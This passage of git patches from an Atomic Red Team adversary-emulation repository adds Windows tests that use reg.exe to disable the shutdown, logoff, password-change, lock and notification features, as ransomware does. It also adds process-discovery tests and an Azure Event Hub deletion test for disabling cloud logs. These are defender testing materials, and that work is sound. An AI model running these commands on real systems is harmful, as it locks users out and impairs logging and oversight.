   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
   - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index cd75cde6..def15a93 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -31778,6 +31778,94 @@ defense-evasion:
         cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"
           /v DisableTaskmgr /f >nul 2>&1
 
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Disable Windows Notification Center
+      auto_generated_guid: c0d6d67f-1f63-42cc-95c0-5fd6b20082ad
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows notification center.
+        See how remcos rat abuse this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer
+          /v DisableNotificationCenter /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer
+          /v DisableNotificationCenter /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Disable Windows Shutdown Button
+      auto_generated_guid: 6e0d1131-2d7e-4905-8ca5-d6172f05d03d
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button.
+        See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System"
+          /v shutdownwithoutlogon /t REG_DWORD /d 0 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System"
+          /v shutdownwithoutlogon /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Disable Windows LogOff Button
+      auto_generated_guid: e246578a-c24d-46a7-9237-0213ff86fb0c
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button.
+        See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /t REG_DWORD /d 1 /f
+          reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f
+        cleanup_command: |
+          reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /f >nul 2>&1
+          reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /f >nul 2>&1
+        name: command_prompt
+        elevation_required: true
+    - name: Disable Windows Change Password Feature
+      auto_generated_guid: d4a6da40-618f-454d-9a9e-26af552aaeb0
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows change password feature.
+        See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"
+          /v DisableChangePassword /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"
+          /v DisableChangePassword /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Disable Windows Lock Workstation Feature
+      auto_generated_guid: 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature.
+        See how ransomware abuse this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"
+          /v DisableLockWorkstation /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"
+          /v DisableLockWorkstation /f >nul 2>&1
+
 '
         name: command_prompt
         elevation_required: true
diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index aed60f59..921e28c8 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -32,6 +32,16 @@ The Registry of a remote system may be modified to aid in execution of files as
 
 - [Atomic Test #11 - Disable Windows Task Manager application](#atomic-test-11---disable-windows-task-manager-application)
 
+- [Atomic Test #12 - Disable Windows Notification Center](#atomic-test-12---disable-windows-notification-center)
+
+- [Atomic Test #13 - Disable Windows Shutdown Button](#atomic-test-13---disable-windows-shutdown-button)
+
+- [Atomic Test #14 - Disable Windows LogOff Button](#atomic-test-14---disable-windows-logoff-button)
+
+- [Atomic Test #15 - Disable Windows Change Password Feature](#atomic-test-15---disable-windows-change-password-feature)
+
+- [Atomic Test #16 - Disable Windows Lock Workstation Feature](#atomic-test-16---disable-windows-lock-workstation-feature)
+
 
 <br/>
 
@@ -441,4 +451,171 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #12 - Disable Windows Notification Center
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows notification center.
+See how remcos rat abuse this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c0d6d67f-1f63-42cc-95c0-5fd6b20082ad
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #13 - Disable Windows Shutdown Button
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button.
+See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 6e0d1131-2d7e-4905-8ca5-d6172f05d03d
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #14 - Disable Windows LogOff Button
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button.
+See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** e246578a-c24d-46a7-9237-0213ff86fb0c
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /t REG_DWORD /d 1 /f
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /f >nul 2>&1
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #15 - Disable Windows Change Password Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows change password feature.
+See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d4a6da40-618f-454d-9a9e-26af552aaeb0
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #16 - Disable Windows Lock Workstation Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature.
+See how ransomware abuse this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /f >nul 2>&1
+```
+
+
+
+
+
 <br/>

From 9dc726b495ad25fb2534eb42252465128043fba7 Mon Sep 17 00:00:00 2001
From: Araveti Esanya Reddy <esanya.araveti@kudelskisecurity.com>
Date: Mon, 14 Mar 2022 23:32:17 +0530
Subject: [PATCH 44/83] updated as per review commets

---
 atomics/T1562.008/T1562.008.yaml | 4 ----
 1 file changed, 4 deletions(-)

diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1562.008/T1562.008.yaml
index 5f70a039..53d5f696 100644
--- a/atomics/T1562.008/T1562.008.yaml
+++ b/atomics/T1562.008/T1562.008.yaml
@@ -83,10 +83,6 @@ atomic_tests:
       $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
       Connect-AzureAD -Credential $creds
       New-AzEventHub -ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name #{event_hub_name}
-    cleanup_command: |
-      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
-      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
-      Connect-AzureAD -Credential $creds
       Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name}
     name: powershell
     elevation_required: false

From 85ea448d3b7b5e1af46ca019b373b7807ca5d010 Mon Sep 17 00:00:00 2001
From: Tim Schulz <78771434+automate-tim@users.noreply.github.com>
Date: Mon, 14 Mar 2022 14:07:08 -0400
Subject: [PATCH 45/83] Added procedural variation to include PowerShell
 execution and WMIC (#1801)

* Added procedural variation to include PowerShell execution and WMIC

* Removed empty GUID lines

* Changed wmic to only command_prompt instead of powershell and command_prompt

Co-authored-by: Tim Schulz <tim@scythe.io>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1057/T1057.yaml | 32 ++++++++++++++++++++++++++++++++
 1 file changed, 32 insertions(+)

diff --git a/atomics/T1057/T1057.yaml b/atomics/T1057/T1057.yaml
index ee79c755..2142182a 100644
--- a/atomics/T1057/T1057.yaml
+++ b/atomics/T1057/T1057.yaml
@@ -34,4 +34,36 @@ atomic_tests:
     command: |
       tasklist
     name: command_prompt
+- name: Process Discovery - Get-Process
+  description: |
+    Utilize Get-Process PowerShell cmdlet to identify processes.
 
+    Upon successful execution, powershell.exe will execute Get-Process to list processes. Output will be via stdout. 
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      Get-Process
+    name: powershell
+- name: Process Discovery - get-wmiObject
+  description: |
+    Utilize get-wmiObject PowerShell cmdlet to identify processes.
+
+    Upon successful execution, powershell.exe will execute get-wmiObject to list processes. Output will be via stdout. 
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      get-wmiObject -class Win32_Process
+    name: powershell
+- name: Process Discovery - wmic process
+  description: |
+    Utilize windows management instrumentation to identify processes.
+
+    Upon successful execution, WMIC will execute process to list processes. Output will be via stdout. 
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      wmic process get /format:list
+    name: command_prompt
\ No newline at end of file

From 3ce01207ea6da04d610471f9942c6f2f52aeb235 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Mon, 14 Mar 2022 18:07:38 +0000
Subject: [PATCH 46/83] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/T1057/T1057.yaml | 3 +++
 atomics/used_guids.txt   | 3 +++
 2 files changed, 6 insertions(+)

diff --git a/atomics/T1057/T1057.yaml b/atomics/T1057/T1057.yaml
index 2142182a..e3939596 100644
--- a/atomics/T1057/T1057.yaml
+++ b/atomics/T1057/T1057.yaml
@@ -35,6 +35,7 @@ atomic_tests:
       tasklist
     name: command_prompt
 - name: Process Discovery - Get-Process
+  auto_generated_guid: 3b3809b6-a54b-4f5b-8aff-cb51f2e97b34
   description: |
     Utilize Get-Process PowerShell cmdlet to identify processes.
 
@@ -46,6 +47,7 @@ atomic_tests:
       Get-Process
     name: powershell
 - name: Process Discovery - get-wmiObject
+  auto_generated_guid: b51239b4-0129-474f-a2b4-70f855b9f2c2
   description: |
     Utilize get-wmiObject PowerShell cmdlet to identify processes.
 
@@ -57,6 +59,7 @@ atomic_tests:
       get-wmiObject -class Win32_Process
     name: powershell
 - name: Process Discovery - wmic process
+  auto_generated_guid: 640cbf6d-659b-498b-ba53-f6dd1a1cc02c
   description: |
     Utilize windows management instrumentation to identify processes.
 
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index abb3c088..4b8e9e76 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -908,3 +908,6 @@ c0d6d67f-1f63-42cc-95c0-5fd6b20082ad
 e246578a-c24d-46a7-9237-0213ff86fb0c
 d4a6da40-618f-454d-9a9e-26af552aaeb0
 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56
+3b3809b6-a54b-4f5b-8aff-cb51f2e97b34
+b51239b4-0129-474f-a2b4-70f855b9f2c2
+640cbf6d-659b-498b-ba53-f6dd1a1cc02c

From 6b82fe5136fc96a5e76db5ea6020e4a1c7187ac5 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 14 Mar 2022 18:07:44 +0000
Subject: [PATCH 47/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  3 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  3 +
 atomics/Indexes/Indexes-Markdown/index.md     |  3 +
 .../Indexes/Indexes-Markdown/windows-index.md |  3 +
 atomics/Indexes/index.yaml                    | 36 +++++++
 atomics/T1057/T1057.md                        | 96 +++++++++++++++++++
 6 files changed, 144 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 4dbe8fde..c617160d 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -863,6 +863,9 @@ discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password
 discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
 discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
 discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
+discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
+discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell
+discovery,T1057,Process Discovery,5,Process Discovery - wmic process,640cbf6d-659b-498b-ba53-f6dd1a1cc02c,command_prompt
 discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
 discovery,T1018,Remote System Discovery,1,Remote System Discovery - net,85321a9c-897f-4a60-9f20-29788e50bccd,command_prompt
 discovery,T1018,Remote System Discovery,2,Remote System Discovery - net group Domain Computers,f1bf6c8f-9016-4edf-aff9-80b65f5d711f,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 5b5eadf1..0f3cc867 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -584,6 +584,9 @@ discovery,T1201,Password Policy Discovery,8,Get-DomainPolicy with PowerView,3177
 discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy,b2698b33-984c-4a1c-93bb-e4ba72a0babb,powershell
 discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
 discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
+discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
+discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell
+discovery,T1057,Process Discovery,5,Process Discovery - wmic process,640cbf6d-659b-498b-ba53-f6dd1a1cc02c,command_prompt
 discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
 discovery,T1018,Remote System Discovery,1,Remote System Discovery - net,85321a9c-897f-4a60-9f20-29788e50bccd,command_prompt
 discovery,T1018,Remote System Discovery,2,Remote System Discovery - net group Domain Computers,f1bf6c8f-9016-4edf-aff9-80b65f5d711f,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index f94c7bc5..b2590017 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1378,6 +1378,9 @@
 - [T1057 Process Discovery](../../T1057/T1057.md)
   - Atomic Test #1: Process Discovery - ps [macos, linux]
   - Atomic Test #2: Process Discovery - tasklist [windows]
+  - Atomic Test #3: Process Discovery - Get-Process [windows]
+  - Atomic Test #4: Process Discovery - get-wmiObject [windows]
+  - Atomic Test #5: Process Discovery - wmic process [windows]
 - [T1012 Query Registry](../../T1012/T1012.md)
   - Atomic Test #1: Query Registry [windows]
 - [T1018 Remote System Discovery](../../T1018/T1018.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index b500a3c2..e82acf47 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -980,6 +980,9 @@
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1057 Process Discovery](../../T1057/T1057.md)
   - Atomic Test #2: Process Discovery - tasklist [windows]
+  - Atomic Test #3: Process Discovery - Get-Process [windows]
+  - Atomic Test #4: Process Discovery - get-wmiObject [windows]
+  - Atomic Test #5: Process Discovery - wmic process [windows]
 - [T1012 Query Registry](../../T1012/T1012.md)
   - Atomic Test #1: Query Registry [windows]
 - [T1018 Remote System Discovery](../../T1018/T1018.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index def15a93..8ec9b797 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -57394,6 +57394,42 @@ discovery:
       executor:
         command: 'tasklist
 
+'
+        name: command_prompt
+    - name: Process Discovery - Get-Process
+      auto_generated_guid: 3b3809b6-a54b-4f5b-8aff-cb51f2e97b34
+      description: "Utilize Get-Process PowerShell cmdlet to identify processes.\n\nUpon
+        successful execution, powershell.exe will execute Get-Process to list processes.
+        Output will be via stdout. \n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'Get-Process
+
+'
+        name: powershell
+    - name: Process Discovery - get-wmiObject
+      auto_generated_guid: b51239b4-0129-474f-a2b4-70f855b9f2c2
+      description: "Utilize get-wmiObject PowerShell cmdlet to identify processes.\n\nUpon
+        successful execution, powershell.exe will execute get-wmiObject to list processes.
+        Output will be via stdout. \n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'get-wmiObject -class Win32_Process
+
+'
+        name: powershell
+    - name: Process Discovery - wmic process
+      auto_generated_guid: 640cbf6d-659b-498b-ba53-f6dd1a1cc02c
+      description: "Utilize windows management instrumentation to identify processes.\n\nUpon
+        successful execution, WMIC will execute process to list processes. Output
+        will be via stdout. \n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'wmic process get /format:list
+
 '
         name: command_prompt
   T1012:
diff --git a/atomics/T1057/T1057.md b/atomics/T1057/T1057.md
index 68e6c297..96b72803 100644
--- a/atomics/T1057/T1057.md
+++ b/atomics/T1057/T1057.md
@@ -10,6 +10,12 @@ In Windows environments, adversaries could obtain details on running processes u
 
 - [Atomic Test #2 - Process Discovery - tasklist](#atomic-test-2---process-discovery---tasklist)
 
+- [Atomic Test #3 - Process Discovery - Get-Process](#atomic-test-3---process-discovery---get-process)
+
+- [Atomic Test #4 - Process Discovery - get-wmiObject](#atomic-test-4---process-discovery---get-wmiobject)
+
+- [Atomic Test #5 - Process Discovery - wmic process](#atomic-test-5---process-discovery---wmic-process)
+
 
 <br/>
 
@@ -80,4 +86,94 @@ tasklist
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - Process Discovery - Get-Process
+Utilize Get-Process PowerShell cmdlet to identify processes.
+
+Upon successful execution, powershell.exe will execute Get-Process to list processes. Output will be via stdout.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3b3809b6-a54b-4f5b-8aff-cb51f2e97b34
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Get-Process
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Process Discovery - get-wmiObject
+Utilize get-wmiObject PowerShell cmdlet to identify processes.
+
+Upon successful execution, powershell.exe will execute get-wmiObject to list processes. Output will be via stdout.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b51239b4-0129-474f-a2b4-70f855b9f2c2
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+get-wmiObject -class Win32_Process
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Process Discovery - wmic process
+Utilize windows management instrumentation to identify processes.
+
+Upon successful execution, WMIC will execute process to list processes. Output will be via stdout.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 640cbf6d-659b-498b-ba53-f6dd1a1cc02c
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+wmic process get /format:list
+```
+
+
+
+
+
+
 <br/>

From b7425664a2cacdd65da5d220519c3b43aa21f3c5 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Mon, 14 Mar 2022 21:06:50 +0000
Subject: [PATCH 48/83] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/used_guids.txt | 1 +
 1 file changed, 1 insertion(+)

diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 4b8e9e76..de1e03e6 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -911,3 +911,4 @@ d4a6da40-618f-454d-9a9e-26af552aaeb0
 3b3809b6-a54b-4f5b-8aff-cb51f2e97b34
 b51239b4-0129-474f-a2b4-70f855b9f2c2
 640cbf6d-659b-498b-ba53-f6dd1a1cc02c
+5e09bed0-7d33-453b-9bf3-caea32bff719

From 12749d4ba69808befe56818d08a54dc0a81f15e8 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 14 Mar 2022 21:06:56 +0000
Subject: [PATCH 49/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 .../art-navigator-layer-iaas-azure.json       |  2 +-
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/linux-index.csv   |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  1 +
 .../Indexes/Indexes-Markdown/linux-index.md   |  1 +
 atomics/Indexes/index.yaml                    | 51 ++++++++++++++++
 atomics/T1562.008/T1562.008.md                | 58 +++++++++++++++++++
 7 files changed, 114 insertions(+), 1 deletion(-)

diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json
index f6d18d8a..84a4357c 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json
@@ -1 +1 @@
-{"version":"4.3","name":"Atomic Red Team (Iaas:Azure)","description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]}]}
\ No newline at end of file
+{"version":"4.3","name":"Atomic Red Team (Iaas:Azure)","description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562","score":100,"enabled":true}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index c617160d..9469cf77 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -353,6 +353,7 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
 defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
 defense-evasion,T1562.008,Disable Cloud Logs,1,AWS CloudTrail Changes,9c10dc6b-20bd-403a-8e67-50ef7d07ed4e,sh
+defense-evasion,T1562.008,Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell
 defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell
 defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell
 defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index 525ea1fa..649d2159 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -97,6 +97,7 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding
